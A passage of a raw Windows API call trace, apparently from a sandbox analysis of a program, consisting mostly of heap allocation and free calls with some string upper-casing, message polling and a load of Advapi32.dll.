0x24b1868 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.150] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.150] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.152] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0252.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.152] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.153] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.153] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.153] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.154] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.155] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.155] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0252.156] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0252.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.158] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.159] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.159] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0252.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18f8 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0252.160] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.161] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0252.161] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.162] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0252.162] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.163] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0252.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0252.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0252.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0252.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.165] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.166] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab68 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0252.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0252.166] 